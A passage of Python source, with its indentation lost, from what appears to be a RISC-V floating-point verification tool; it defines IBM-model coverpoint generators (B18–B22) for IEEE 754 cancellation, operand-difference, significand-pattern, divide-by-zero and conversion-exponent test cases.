ir_dataset.append([str(Decimal(ieee754_num[k].split('e')[0])+Decimal(pow(i*16,-14)))+'e'+ieee754_num[k].split('e')[1],' | Guard = '+grs[0]+' Sticky = '+grs[2]+' Sign = '+sign+' LSB = '+lsb[k] + ': Multiply add - Guard & Sticky Cancellation'])
b18_comb = []
for i in range(len(ir_dataset)):
rs1 = random.uniform(1,maxnum)
res = '0x1.7ffff0p+100'
res = float.fromhex(res)
if opcode in 'fmadd':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
rs3 = res - ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = Decimal(res) - Decimal(ir_dataset[i][0])
elif opcode in 'fnmadd':
if flen == 32:
rs2 = -1*ir_dataset[i][0]/rs1
rs3 = -1*res + ir_dataset[i][0]
elif flen == 64:
rs2 = -1*Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = -1*Decimal(res) - Decimal(ir_dataset[i][0])
elif opcode in 'fmsub':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
rs3 = ir_dataset[i][0] - res
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = Decimal(ir_dataset[i][0]) - Decimal(res)
elif opcode in 'fnmsub':
if flen == 32:
rs2 = -1*ir_dataset[i][0]/rs1
rs3 = res - ir_dataset[i][0]
elif flen == 64:
rs2 = -1*Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = Decimal(res) - Decimal(ir_dataset[i][0])
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
x3 = struct.unpack('f', struct.pack('f', rs3))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
x3 = rs3
if opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
b18_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
ir_dataset1 = ir_dataset
# Cancellation of B4
if flen == 32:
ieee754_maxnorm_p = '0x1.7fffffp+127'
ieee754_maxnorm_n = '0x1.7ffffep+127'
maxnum = float.fromhex(ieee754_maxnorm_p)
ir_dataset = []
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([ieee754_maxnorm_p.split('p')[0]+str(i)+'p'+ieee754_maxnorm_p.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Overflow Cancellation'])
ir_dataset.append([ieee754_maxnorm_n.split('p')[0]+str(i)+'p'+ieee754_maxnorm_n.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm - '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Overflow Cancellation'])
for i in range(len(ir_dataset)):
ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
elif flen == 64:
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
maxdec_p = str(maxnum)
maxdec_n = str(float.fromhex('0x1.ffffffffffffep+1023'))
ir_dataset = []
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(maxdec_p.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+maxdec_p.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Overflow Cancellation'])
ir_dataset.append([str(Decimal(maxdec_n.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+maxdec_n.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm - '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Overflow Cancellation'])
for i in range(len(ir_dataset)):
rs1 = random.uniform(1,maxnum)
res = '0x1.7ffff0p+100'
res = float.fromhex(res)
if opcode in 'fmadd':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
rs3 = res - ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = Decimal(res) - Decimal(ir_dataset[i][0])
elif opcode in 'fnmadd':
if flen == 32:
rs2 = -1*ir_dataset[i][0]/rs1
rs3 = -1*res + ir_dataset[i][0]
elif flen == 64:
rs2 = -1*Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = -1*Decimal(res) - Decimal(ir_dataset[i][0])
elif opcode in 'fmsub':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
rs3 = ir_dataset[i][0] - res
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = Decimal(ir_dataset[i][0]) - Decimal(res)
elif opcode in 'fnmsub':
if flen == 32:
rs2 = -1*ir_dataset[i][0]/rs1
rs3 = res - ir_dataset[i][0]
elif flen == 64:
rs2 = -1*Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = Decimal(res) - Decimal(ir_dataset[i][0])
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
x3 = struct.unpack('f', struct.pack('f', rs3))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
x3 = rs3
if opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
b18_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
ir_dataset2 = ir_dataset
# Cancellation of B5
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.000001p-126'
ir_dataset = []
for i in range(0,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([ieee754_minsubnorm.split('p')[0]+str(i)+'p'+ieee754_minsubnorm.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minsubnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Underflow Cancellation'])
ieee754_minnorm = '0x1.000000p-126'
for i in range(0,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([ieee754_minnorm.split('p')[0]+str(i)+'p'+ieee754_minnorm.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Underflow Cancellation'])
n = len(ir_dataset)
for i in range(n):
ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
ir_dataset.append([-1*ir_dataset[i][0],ir_dataset[i][1]])
elif flen == 64:
maxdec = '1.7976931348623157e+308'
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
minsubdec = '5e-324'
ir_dataset = []
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(minsubdec.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+minsubdec.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minsubnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Underflow Cancellation'])
minnormdec = '2.2250738585072014e-308'
ir_dataset.append([minsubdec, ' | Guard = 0 Round = 0 Sticky = 0 --> Minsubnorm + 0 ulp'])
ir_dataset.append([minnormdec,' | Guard = 0 Round = 0 Sticky = 0 --> Minnorm + 0 ulp'])
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(minnormdec.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+minnormdec.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Underflow Cancellation'])
n = len(ir_dataset)
for i in range(n):
ir_dataset.append(['-'+ir_dataset[i][0],ir_dataset[i][1]])
for i in range(len(ir_dataset)):
rs1 = random.uniform(1,maxnum)
res = '0x1.7ffff0p+100'
res = float.fromhex(res)
if opcode in 'fmadd':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
rs3 = res - ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = Decimal(res) - Decimal(ir_dataset[i][0])
elif opcode in 'fnmadd':
if flen == 32:
rs2 = -1*ir_dataset[i][0]/rs1
rs3 = -1*res + ir_dataset[i][0]
elif flen == 64:
rs2 = -1*Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = -1*Decimal(res) - Decimal(ir_dataset[i][0])
elif opcode in 'fmsub':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
rs3 = ir_dataset[i][0] - res
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = Decimal(ir_dataset[i][0]) - Decimal(res)
elif opcode in 'fnmsub':
if flen == 32:
rs2 = -1*ir_dataset[i][0]/rs1
rs3 = res - ir_dataset[i][0]
elif flen == 64:
rs2 = -1*Decimal(ir_dataset[i][0])/Decimal(rs1)
rs3 = Decimal(res) - Decimal(ir_dataset[i][0])
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
x3 = struct.unpack('f', struct.pack('f', rs3))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
x3 = rs3
if opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
b18_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
ir_dataset3 = ir_dataset
ir_dataset = ir_dataset1 + ir_dataset2 + ir_dataset3
coverpoints = []
k = 0
for c in b18_comb:
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += ir_dataset[k][1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B18 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b19(flen, opcode, ops, seed=-1):
'''
IBM Model B19 Definition:
This model checks various possible differences between the two inputs.
A test-case will be created for each combination of the following table::
First input Second input Difference between exponents Difference between significands
+Normal +Normal >0 >0
-Normal -Normal =0 =0
+SubNormal +SubNormal <0 <0
-SubNormal -SubNormal
0 0
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Operand1 {operation} Operand2 = Derived from the table above
Implementation:
- Normal (positive and negative), subnormal (positive and negative) arrays are randomly initialized within their respectively declared ranges.
- The difference between exponents and significands are formed as per the conditions in the table.
- All possible combinations of the table are used in creating the test-cases.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 40
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.000001p-126'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.7fffffp-126'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
limnum = maxnum
elif flen == 64:
ieee754_maxnorm = '0x1.fffffffffffffp+1023'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.0000000000001p-1022'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.fffffffffffffp-1022'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
ieee754_limnum = '0x1.fffffffffffffp+507'
limnum = float.fromhex(ieee754_limnum)
if seed == -1:
if opcode in 'fmin':
random.seed(0)
elif opcode in 'fmax':
random.seed(1)
elif opcode in 'flt':
random.seed(2)
elif opcode in 'feq':
random.seed(3)
elif opcode in 'fle':
random.seed(3)
else:
random.seed(seed)
b19_comb = []
comment = []
normal = []
normal_neg = []
sub_normal = []
sub_normal_neg = []
zero = [[0e0,'Zero']]
for i in range(5):
normal.append([random.uniform(1,maxnum),'Normal'])
normal_neg.append([random.uniform(-1*maxnum,-1),'-Normal'])
sub_normal.append([random.uniform(minsubnorm,maxsubnorm),'Subnormal'])
sub_normal_neg.append([random.uniform(-1*maxsubnorm,-1*minsubnorm),'-Subnormal'])
all_num = normal + normal_neg + sub_normal + sub_normal_neg + zero
for i in all_num:
for j in all_num:
if i[0] != 0:
i_sig = str(i[0]).split('e')[0]
i_exp = str(i[0]).split('e')[1]
else:
i_sig = '0'
i_exp = '0'
if j[0] != 0:
j_sig = str(j[0]).split('e')[0]
j_exp = str(j[0]).split('e')[1]
else:
j_sig = '0'
j_exp = '0'
if float(i_sig) >= float(j_sig): sig_sign = '>='
else: sig_sign = '<'
if float(i_exp) >= float(j_exp): exp_sign = '>='
else: exp_sign = '<'
rs1 = float(i_sig+'e'+i_exp)
rs2 = float(j_sig+'e'+j_exp)
b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
comment.append(' | rs1 --> ' + i[1] + ', rs2 --> ' + j[1] + ', rs1_sigificand ' + sig_sign + ' rs2_significand' + ', rs1_exp ' + exp_sign + ' rs2_exp')
rs1 = float(i_sig+'e'+j_exp)
rs2 = float(j_sig+'e'+i_exp)
b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
comment.append(' | rs1 --> ' + j[1] + ', rs2 --> ' + i[1] + ', rs1_sigificand ' + sig_sign + ' rs2_significand' + ', rs2_exp ' + exp_sign + ' rs1_exp')
rs1 = float(j_sig+'e'+i_exp)
rs2 = float(i_sig+'e'+j_exp)
b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
comment.append(' | rs1 --> ' + j[1] + ', rs2 --> ' + i[1] + ', rs2_sigificand ' + sig_sign + ' rs1_significand' + ', rs1_exp ' + exp_sign + ' rs2_exp')
rs1 = float(i_sig+'e'+j_exp)
rs2 = float(j_sig+'e'+j_exp)
b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
comment.append(' | rs1 --> ' + j[1] + ', rs2 --> ' + j[1] + ', rs1_sigificand ' + sig_sign + ' rs2_significand' + ', rs1_exp = rs2_exp')
rs1 = float(i_sig+'e'+i_exp)
rs2 = float(i_sig+'e'+j_exp)
b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
comment.append(' | rs1 --> ' + i[1] + ', rs2 --> ' + j[1] + ', rs1_sigificand = rs2_significand' + ', rs1_exp ' + exp_sign + ' rs2_exp')
rs1 = float(i_sig+'e'+i_exp)
rs2 = float(i_sig+'e'+i_exp)
b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
comment.append(' | rs1 --> ' + i[1] + ', rs2 --> ' + i[1] + ', rs1_sigificand = rs2_significand, rs1_exp = rs2_exp')
coverpoints = []
k = 0
for c in b19_comb:
cvpt = ""
for x in range(1, 3):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
if opcode in ["fadd","fsub","fmul","fdiv","fsqrt","fmadd","fnmadd","fmsub","fnmsub","fcvt","fmv","fle","fmv","fmin","fsgnj"]:
cvpt += 'rm_val == 0'
elif opcode in ["fclass","flt","fmax","fsgnjn"]:
cvpt += 'rm_val == 1'
elif opcode in ["feq","flw","fsw","fsgnjx"]:
cvpt += 'rm_val == 2'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment[k]
coverpoints.append(cvpt)
k += 1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B19 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b20(flen, opcode, ops, seed=-1):
'''
IBM Model B20 Definition:
This model will create test-cases such that the significand of the intermediate results will cover each of the following patterns:
Mask on the intermediate result significand (excluding the leading “1” )
.. code-block::
xxx...xxx10
xxx...xx100
xxx...x1000
…
xx1...00000
x10...00000
100...00000
000...00000
The sticky bit of the intermediate result should always be 0. In case of the remainder operation, we will look at the result of the division in order to find the interesting test-cases.
Operation: Divide, Square-root.
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Results = [Random bits are taken initially to form xxx...xxx10. The pattern described above is then formed]
Operand1 {operation} Operand2 = Intermediate Results
Implementation:
- A loop is initiated where random bits are obtained for which the subsequent sign, exponent is calculated for the intermediate value and stored in the ir_dataset.
- Operand 1 (rs1) is randomly initialized in the range (1, limnum) and the subsequent operator value is found.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 60
if seed == -1:
if opcode in 'fdiv':
random.seed(1)
elif opcode in 'fsqrt':
random.seed(2)
else:
random.seed(seed)
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.000001p-126'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.7fffffp-126'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
limnum = maxnum
ir_dataset = []
for i in range(1,21,1):
for k in range(5):
bits = random.getrandbits(i)
bits = bin(bits)[2:]
front_zero = i-len(bits)
bits = '0'*front_zero + bits
trailing_zero = 22-i
sig = bits+'1'+'0'*trailing_zero
exp = random.getrandbits(8)
exp = '{:08b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
ir_dataset.append([ir, ' | Intermediate result significand: ' + sig + ' Pattern: ' + 'X'*i + '1' + '0'*trailing_zero])
sig = '1'+'0'*22
exp = random.getrandbits(8)
exp = '{:08b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
ir_dataset.append([ir, 'Intermediate result significand: '+ sig + ' Pattern: ' + '1' + '0'*22])
sig = '0'*23
exp = random.getrandbits(8)
exp = '{:08b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
ir_dataset.append([ir, 'Intermediate result significand: '+ sig + ' Pattern: ' + '0' + '0'*22])
elif flen == 64:
ieee754_maxnorm = '0x1.fffffffffffffp+1023'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.0000000000001p-1022'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.fffffffffffffp-1022'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
ieee754_limnum = '0x1.fffffffffffffp+507'
limnum = float.fromhex(ieee754_limnum)
ieee754_num = []
ir_dataset = []
for i in range(1,50,1):
for k in range(5):
bits = random.getrandbits(i)
bits = bin(bits)[2:]
front_zero = i-len(bits)
bits = '0'*front_zero + bits
trailing_zero = 51-i
sig = bits+'1'+'0'*trailing_zero
exp = random.getrandbits(11)
exp = '{:011b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
ir_dataset.append([ir, ' | Intermediate result significand: ' + sig + ' Pattern: ' + 'X'*i + '1' + '0'*trailing_zero])
sig = '1'+'0'*51
exp = random.getrandbits(8)
exp = '{:08b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
ir_dataset.append([ir, 'Intermediate result significand: '+ sig + ' Pattern: ' + '1' + '0'*51])
sig = '0'*52
exp = random.getrandbits(8)
exp = '{:08b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
ir_dataset.append([ir, 'Intermediate result significand: ' + sig + ' Pattern: ' + '0' + '0'*52])
b8_comb = []
for i in range(len(ir_dataset)):
rs1 = random.uniform(1, limnum)
if opcode in 'fdiv':
if flen == 32:
rs2 = rs1/ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
elif opcode in 'fsqrt':
if flen == 32:
rs2 = ir_dataset[i][0]*ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
if opcode in ['fdiv']:
b8_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
elif opcode in 'fsqrt':
b8_comb.append((floatingPoint_tohex(flen,float(rs2)),))
coverpoints = []
k=0
for c in b8_comb:
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += ir_dataset[k][1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B20 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b21(flen, opcode, ops):
'''
IBM Model B21 Definition:
This model will test the Divide By Zero exception flag. For the operations divide and remainder, a test case will be created for each of the possible combinations from the following table:
First Operand : 0, Random non-zero number, Infinity, NaN
Second Operand : 0, Random non-zero number, Infinity, NaN
Operation: Divide, Remainder
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:type flen: int
:type opcode: str
:type ops: int
Abstract Dataset Description:
Final Results = [ Zero, Subnorm, Norm, Infinity, DefaultNaN, QNaN, SNaN ]
Implementation:
- The basic_types dataset is accumulated with the combinations of the abstract dataset description.
- Using python’s package itertools, a permutation of all possible combinations as a pair is computed for basic_types dataset..
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
if flen == 32:
basic_types = fzero + fsubnorm + fnorm + finfinity + fdefaultnan + [fqnan[0], fqnan[3]] + \
[fsnan[0], fsnan[3]]
elif flen == 64:
basic_types = dzero + dsubnorm + dnorm +\
dinfinity + ddefaultnan + [dqnan[0], dqnan[1]] + \
[dsnan[0], dsnan[1]]
else:
logger.error('Invalid flen value!')
sys.exit(1)
# the following creates a cross product for ops number of variables
b21_comb = list(itertools.product(*ops*[basic_types]))
coverpoints = []
for c in b21_comb:
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
if opcode.split('.')[0] in ["fdiv"]:
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
coverpoints.append(cvpt)
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B21 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b22(flen, opcode, ops, seed=10):
'''
IBM Model B22 Definition:
This model creates test cases for each of the following exponents (unbiased):
1. Smaller than -3
2. All the values in the range [-3, integer width+3]
3. Larger than integer width + 3
For each exponent two cases will be randomly chosen, positive and negative.
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Operand1 = [Smaller than -3, All the values in the range [-3, integer width+3], Larger than integer width + 3]
Implementation:
- Random bits are calculated and appended to obtain the exponent ranges defined in case 2.
- To satisfy case 1 and case 3, similar steps are performed outside the loop and hence updated in the loop.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
if opcode[2] == 's': flen = 32
elif opcode[2] == 'd': flen = 64
getcontext().prec = 40
xlen = 0
if opcode in 'fcvt.w':
xlen = 32
elif opcode in 'fcvt.l':
xlen = 64
elif opcode in 'fcvt.wu':
xlen = 32
elif opcode in 'fcvt.lu':
xlen = 64
if seed == -1:
if opcode in 'fcvt.w':
random.seed(0)
elif opcode in 'fcvt.l':
random.seed(1)
elif opcode in 'fcvt.wu':
random.seed(2)
elif opcode in 'fcvt.lu':
random.seed(3)
else:
random.seed(seed)
b22_comb = []
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.000001p-126'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.7fffffp-126'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
limnum = maxnum
op_dataset = []
for i in range(124,xlen+130,1):
bits = random.getrandbits(23)
bits = bin(bits)[2:]
front_zero = 23-len(bits)
sig = '0'*front_zero + bits
exp = i
exp = '{:08b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-127) + ', Exponent in the range [-3, integer width+3]'])
b22_comb.append((floatingPoint_tohex(flen,float(op)),))
bits = random.getrandbits(23)
bits = bin(bits)[2:]
front_zero = 23-len(bits)
sig = '0'*front_zero + bits
exp = random.randint(0,124)
exp = '{:08b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-127) + ', Exponent less than -3'])
b22_comb.append((floatingPoint_tohex(flen,float(op)),))
bits = random.getrandbits(23)
bits = bin(bits)[2:]
front_zero = 23-len(bits)
sig = '0'*front_zero + bits
exp = random.randint(xlen+130,255)
exp = '{:08b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-127) + ', Exponent greater than (integer width+3)'])
b22_comb.append((floatingPoint_tohex(flen,float(op)),))
elif flen == 64:
ieee754_maxnorm = '0x1.fffffffffffffp+1023'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.0000000000001p-1022'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.fffffffffffffp-1022'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
ieee754_limnum = '0x1.fffffffffffffp+507'
limnum = float.fromhex(ieee754_limnum)
op_dataset = []
for i in range(1020,xlen+1026,1):
bits = random.getrandbits(52)
bits = bin(bits)[2:]
front_zero = 52-len(bits)
sig = '0'*front_zero + bits
exp = i
